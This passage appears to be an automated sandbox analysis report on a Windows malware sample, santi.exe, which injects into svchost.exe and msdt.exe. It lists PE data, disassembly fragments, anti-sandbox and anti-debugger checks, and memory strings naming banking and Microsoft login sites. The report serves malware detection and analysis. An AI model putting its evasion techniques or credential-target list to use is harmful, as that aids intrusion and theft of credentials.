                Source: santi.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: santi.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: santi.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: santi.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: msdt.pdbGCTL source: svchost.exe, 00000007.00000003.1684331959.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1684439953.0000000002C7A000.00000004.00000020.00020000.00000000.sdmp, lavilIyGJqg.exe, 0000000A.00000003.1654470150.0000000000F65000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: lavilIyGJqg.exe, 0000000A.00000002.3129958967.00000000009CE000.00000002.00000001.01000000.00000005.sdmp, lavilIyGJqg.exe, 0000000C.00000000.1798745572.00000000009CE000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: santi.exe, 00000000.00000003.1274830080.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, santi.exe, 00000000.00000003.1292502476.0000000003840000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1717067620.000000000339E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1717067620.0000000003200000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1624933286.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1623193414.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, 0000000B.00000003.1717001856.00000000043AE000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, 0000000B.00000003.1719316907.000000000455B000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, 0000000B.00000002.3132861268.00000000048AE000.00000040.00001000.00020000.00000000.sdmp, msdt.exe, 0000000B.00000002.3132861268.0000000004710000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: santi.exe, 00000000.00000003.1274830080.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, santi.exe, 00000000.00000003.1292502476.0000000003840000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000007.00000002.1717067620.000000000339E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1717067620.0000000003200000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1624933286.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1623193414.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, msdt.exe, 0000000B.00000003.1717001856.00000000043AE000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, 0000000B.00000003.1719316907.000000000455B000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, 0000000B.00000002.3132861268.00000000048AE000.00000040.00001000.00020000.00000000.sdmp, msdt.exe, 0000000B.00000002.3132861268.0000000004710000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: msdt.exe, 0000000B.00000002.3133665309.0000000004D3C000.00000004.10000000.00040000.00000000.sdmp, msdt.exe, 0000000B.00000002.3129214060.0000000000582000.00000004.00000020.00020000.00000000.sdmp, lavilIyGJqg.exe, 0000000C.00000002.3133057463.00000000031CC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000010.00000002.2038827866.000000000A32C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: msdt.exe, 0000000B.00000002.3133665309.0000000004D3C000.00000004.10000000.00040000.00000000.sdmp, msdt.exe, 0000000B.00000002.3129214060.0000000000582000.00000004.00000020.00020000.00000000.sdmp, lavilIyGJqg.exe, 0000000C.00000002.3133057463.00000000031CC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000010.00000002.2038827866.000000000A32C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: msdt.pdb source: svchost.exe, 00000007.00000003.1684331959.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1684439953.0000000002C7A000.00000004.00000020.00020000.00000000.sdmp, lavilIyGJqg.exe, 0000000A.00000003.1654470150.0000000000F65000.00000004.00000020.00020000.00000000.sdmp
                Source: santi.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: santi.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: santi.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: santi.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: santi.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\santi.exeCode function: 0_2_002FE01E LoadLibraryA,GetProcAddress,0_2_002FE01E
                Source: C:\Users\user\Desktop\santi.exeCode function: 0_2_00306B05 push ecx; ret 0_2_00306B18
                Source: C:\Users\user\Desktop\santi.exeCode function: 0_2_00E18C59 push eax; retf 0_2_00E18C57
                Source: C:\Users\user\Desktop\santi.exeCode function: 0_2_00E18C2F push eax; retf 0_2_00E18C57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_006F3000 push eax; ret 7_2_006F3002
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00707281 push cs; ret 7_2_00707282
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00708B78 push es; retf 7_2_00708B89
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00708B98 push es; retf 7_2_00708B89
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_006F1540 push esi; retf E746h7_2_006F186F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0070663A pushad ; retf 7_2_00706640
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00714F93 push edi; ret 7_2_00714F9E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032309AD push ecx; mov dword ptr [esp], ecx7_2_032309B6
                Source: C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exeCode function: 10_2_053E7EBF push ss; retf 10_2_053E7EC1
                Source: C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exeCode function: 10_2_053E8EEF pushad ; retf 10_2_053E8EF5
                Source: C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exeCode function: 10_2_053E8060 push 2B3FE2CEh; ret 10_2_053E808E
                Source: C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exeCode function: 10_2_053F7848 push edi; ret 10_2_053F7853
                Source: C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exeCode function: 10_2_053E9B36 push cs; ret 10_2_053E9B37
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_047409AD push ecx; mov dword ptr [esp], ecx11_2_047409B6
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0042C1DF push FFFFFFD8h; retf 11_2_0042C203
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0042427E push cs; ret 11_2_0042427F
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_00422607 push ss; retf 11_2_00422609
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_004227A8 push 2B3FE2CEh; ret 11_2_004227D6
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_00423637 pushad ; retf 11_2_0042363D
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0042B9E1 push ebx; iretd 11_2_0042B9E2
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_00425B75 push es; retf 11_2_00425B86
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_00425B95 push es; retf 11_2_00425B86
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_00429F55 push ebp; iretd 11_2_00429F57
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_00431F90 push edi; ret 11_2_00431F9B
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_043AB5F8 push edi; retf 11_2_043AB64E
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_043AB5ED push edi; retf 11_2_043AB64E
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_043AB64F push edi; retf 11_2_043AB64E
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_043B5272 push eax; ret 11_2_043B5274
                Source: C:\Users\user\Desktop\santi.exeCode function: 0_2_00348111 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00348111
                Source: C:\Users\user\Desktop\santi.exeCode function: 0_2_002FEB42 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_002FEB42
                Source: C:\Users\user\Desktop\santi.exeCode function: 0_2_0030123A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0030123A
                Source: C:\Users\user\Desktop\santi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Switches to a custom stack to bypass stack traces
                Source: C:\Users\user\Desktop\santi.exeAPI/Special instruction interceptor: Address: E181C4
                Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                Source: santi.exe, 00000000.00000002.1294074530.0000000000FA6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FIDDLER.EXEB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0327096E rdtsc 7_2_0327096E
                Source: C:\Users\user\Desktop\santi.exeEvaded block: after key decisiongraph_0-93172
                Source: C:\Users\user\Desktop\santi.exeAPI coverage: 4.4 %
                Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
                Source: C:\Windows\SysWOW64\msdt.exeAPI coverage: 2.7 %
                Source: C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exe TID: 7784Thread sleep time: -50000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exe TID: 7784Thread sleep time: -31500s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\msdt.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\msdt.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\santi.exeCode function: 0_2_00326CA9 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00326CA9
                Source: C:\Users\user\Desktop\santi.exeCode function: 0_2_003260DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,0_2_003260DD
                Source: C:\Users\user\Desktop\santi.exeCode function: 0_2_003263F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,0_2_003263F9
                Source: C:\Users\user\Desktop\santi.exeCode function: 0_2_0032EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0032EB60
                Source: C:\Users\user\Desktop\santi.exeCode function: 0_2_0032F56F FindFirstFileW,FindClose,0_2_0032F56F
                Source: C:\Users\user\Desktop\santi.exeCode function: 0_2_0032F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0032F5FA
                Source: C:\Users\user\Desktop\santi.exeCode function: 0_2_00331B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00331B2F
                Source: C:\Users\user\Desktop\santi.exeCode function: 0_2_00331C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00331C8A
                Source: C:\Users\user\Desktop\santi.exeCode function: 0_2_00331F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00331F94
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0042C730 FindFirstFileW,FindNextFileW,FindClose,11_2_0042C730
                Source: C:\Users\user\Desktop\santi.exeCode function: 0_2_002FDDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_002FDDC0
                Source: msdt.exe, 0000000B.00000002.3135470132.0000000007787000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware
                Source: 73272964.11.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
                Source: 73272964.11.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
                Source: 73272964.11.drBinary or memory string: Canara Transaction PasswordVMware20,11696492231}
                Source: 73272964.11.drBinary or memory string: interactivebrokers.co.inVMware20,11696492231d
                Source: 73272964.11.drBinary or memory string: netportal.hdfcbank.comVMware20,11696492231
                Source: 73272964.11.drBinary or memory string: outlook.office.comVMware20,11696492231s
                Source: 73272964.11.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
                Source: 73272964.11.drBinary or memory string: AMC password management pageVMware20,11696492231
                Source: 73272964.11.drBinary or memory string: interactivebrokers.comVMware20,11696492231
                Source: 73272964.11.drBinary or memory string: microsoft.visualstudio.comVMware20,11696492231x
                Source: 73272964.11.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
                Source: 73272964.11.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
                Source: 73272964.11.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696492231
                Source: 73272964.11.drBinary or memory string: outlook.office365.comVMware20,11696492231t
                Source: 73272964.11.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
                Source: 73272964.11.drBinary or memory string: discord.comVMware20,11696492231f
                Source: msdt.exe, 0000000B.00000002.3129214060.0000000000582000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.2044321574.000001EE4A39C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: 73272964.11.drBinary or memory string: global block list test formVMware20,11696492231
                Source: 73272964.11.drBinary or memory string: dev.azure.comVMware20,11696492231j
                Source: 73272964.11.drBinary or memory string: www.interactivebrokers.comVMware20,11696492231}
                Source: 73272964.11.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
                Source: 73272964.11.drBinary or memory string: bankofamerica.comVMware20,11696492231x
                Source: 73272964.11.drBinary or memory string: trackpan.utiitsl.comVMware20,11696492231h
                Source: lavilIyGJqg.exe, 0000000C.00000002.3131631693.000000000139F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll1
                Source: 73272964.11.drBinary or memory string: tasks.office.comVMware20,11696492231o
                Source: 73272964.11.drBinary or memory string: account.microsoft.com/profileVMware20,11696492231u
                Source: 73272964.11.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231
                Source: 73272964.11.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
                Source: 73272964.11.drBinary or memory string: ms.portal.azure.comVMware20,11696492231
                Source: msdt.exe, 0000000B.00000002.3135470132.0000000007787000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: image_urlVARCHARVMware
                Source: 73272964.11.drBinary or memory string: turbotax.intuit.comVMware20,11696492231t
                Source: 73272964.11.drBinary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
                Source: 73272964.11.drBinary or memory string: Canara Transaction PasswordVMware20,11696492231x
                Source: 73272964.11.drBinary or memory string: Interactive Brokers - HKVMware20,11696492231]
                Source: C:\Users\user\Desktop\santi.exeAPI call chain: ExitProcess graph end nodegraph_0-92959
                Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\msdt.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0327096E rdtsc 7_2_0327096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00707743 LdrLoadDll,7_2_00707743
                Source: C:\Users\user\Desktop\santi.exeCode function: 0_2_00336AAF BlockInput,0_2_00336AAF
                Source: C:\Users\user\Desktop\santi.exeCode function: 0_2_002E3D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_002E3D19
                Source: C:\Users\user\Desktop\santi.exeCode function: 0_2_00313920 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,0_2_00313920
                Source: C:\Users\user\Desktop\santi.exeCode function: 0_2_002FE01E LoadLibraryA,GetProcAddress,0_2_002FE01E
                Source: C:\Users\user\Desktop\santi.exeCode function: 0_2_00E18490 mov eax, dword ptr fs:[00000030h]0_2_00E18490
                Source: C:\Users\user\Desktop\santi.exeCode function: 0_2_00E18430 mov eax, dword ptr fs:[00000030h]0_2_00E18430
                Source: C:\Users\user\Desktop\santi.exeCode function: 0_2_00E16DE0 mov eax, dword ptr fs:[00000030h]0_2_00E16DE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0326A30B mov eax, dword ptr fs:[00000030h]7_2_0326A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0326A30B mov eax, dword ptr fs:[00000030h]7_2_0326A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0326A30B mov eax, dword ptr fs:[00000030h]7_2_0326A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0322C310 mov ecx, dword ptr fs:[00000030h]7_2_0322C310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03250310 mov ecx, dword ptr fs:[00000030h]7_2_03250310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032D437C mov eax, dword ptr fs:[00000030h]7_2_032D437C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032B2349 mov eax, dword ptr fs:[00000030h]7_2_032B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032B2349 mov eax, dword ptr fs:[00000030h]7_2_032B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032B2349 mov eax, dword ptr fs:[00000030h]7_2_032B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032B2349 mov eax, dword ptr fs:[00000030h]7_2_032B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032B2349 mov eax, dword ptr fs:[00000030h]7_2_032B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032B2349 mov eax, dword ptr fs:[00000030h]7_2_032B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032B2349 mov eax, dword ptr fs:[00000030h]7_2_032B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032B2349 mov eax, dword ptr fs:[00000030h]7_2_032B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032B2349 mov eax, dword ptr fs:[00000030h]7_2_032B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032B2349 mov eax, dword ptr fs:[00000030h]7_2_032B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032B2349 mov eax, dword ptr fs:[00000030h]7_2_032B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032B2349 mov eax, dword ptr fs:[00000030h]7_2_032B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032B2349 mov eax, dword ptr fs:[00000030h]7_2_032B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032B2349 mov eax, dword ptr fs:[00000030h]7_2_032B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032B2349 mov eax, dword ptr fs:[00000030h]7_2_032B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032B035C mov eax, dword ptr fs:[00000030h]7_2_032B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032B035C mov eax, dword ptr fs:[00000030h]7_2_032B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032B035C mov eax, dword ptr fs:[00000030h]7_2_032B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032B035C mov ecx, dword ptr fs:[00000030h]7_2_032B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032B035C mov eax, dword ptr fs:[00000030h]7_2_032B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032B035C mov eax, dword ptr fs:[00000030h]7_2_032B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032FA352 mov eax, dword ptr fs:[00000030h]7_2_032FA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0322E388 mov eax, dword ptr fs:[00000030h]7_2_0322E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0322E388 mov eax, dword ptr fs:[00000030h]7_2_0322E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0322E388 mov eax, dword ptr fs:[00000030h]7_2_0322E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0325438F mov eax, dword ptr fs:[00000030h]7_2_0325438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0325438F mov eax, dword ptr fs:[00000030h]7_2_0325438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03228397 mov eax, dword ptr fs:[00000030h]7_2_03228397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03228397 mov eax, dword ptr fs:[00000030h]7_2_03228397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03228397 mov eax, dword ptr fs:[00000030h]7_2_03228397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032403E9 mov eax, dword ptr fs:[00000030h]7_2_032403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032403E9 mov eax, dword ptr fs:[00000030h]7_2_032403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032403E9 mov eax, dword ptr fs:[00000030h]7_2_032403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032403E9 mov eax, dword ptr fs:[00000030h]7_2_032403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032403E9 mov eax, dword ptr fs:[00000030h]7_2_032403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032403E9 mov eax, dword ptr fs:[00000030h]7_2_032403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032403E9 mov eax, dword ptr fs:[00000030h]7_2_032403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032403E9 mov eax, dword ptr fs:[00000030h]7_2_032403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0324E3F0 mov eax, dword ptr fs:[00000030h]7_2_0324E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0324E3F0 mov eax, dword ptr fs:[00000030h]7_2_0324E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0324E3F0 mov eax, dword ptr fs:[00000030h]7_2_0324E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032663FF mov eax, dword ptr fs:[00000030h]7_2_032663FF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032EC3CD mov eax, dword ptr fs:[00000030h]7_2_032EC3CD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0323A3C0 mov eax, dword ptr fs:[00000030h]7_2_0323A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0323A3C0 mov eax, dword ptr fs:[00000030h]7_2_0323A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0323A3C0 mov eax, dword ptr fs:[00000030h]7_2_0323A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0323A3C0 mov eax, dword ptr fs:[00000030h]7_2_0323A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0323A3C0 mov eax, dword ptr fs:[00000030h]7_2_0323A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0323A3C0 mov eax, dword ptr fs:[00000030h]7_2_0323A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032383C0 mov eax, dword ptr fs:[00000030h]7_2_032383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032383C0 mov eax, dword ptr fs:[00000030h]7_2_032383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032383C0 mov eax, dword ptr fs:[00000030h]7_2_032383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032383C0 mov eax, dword ptr fs:[00000030h]7_2_032383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032B63C0 mov eax, dword ptr fs:[00000030h]7_2_032B63C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0322823B mov eax, dword ptr fs:[00000030h]7_2_0322823B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03234260 mov eax, dword ptr fs:[00000030h]7_2_03234260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03234260 mov eax, dword ptr fs:[00000030h]7_2_03234260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03234260 mov eax, dword ptr fs:[00000030h]7_2_03234260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0322826B mov eax, dword ptr fs:[00000030h]7_2_0322826B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032E0274 mov eax, dword ptr fs:[00000030h]7_2_032E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032E0274 mov eax, dword ptr fs:[00000030h]7_2_032E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032E0274 mov eax, dword ptr fs:[00000030h]7_2_032E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032E0274 mov eax, dword ptr fs:[00000030h]7_2_032E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032E0274 mov eax, dword ptr fs:[00000030h]7_2_032E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032E0274 mov eax, dword ptr fs:[00000030h]7_2_032E0274
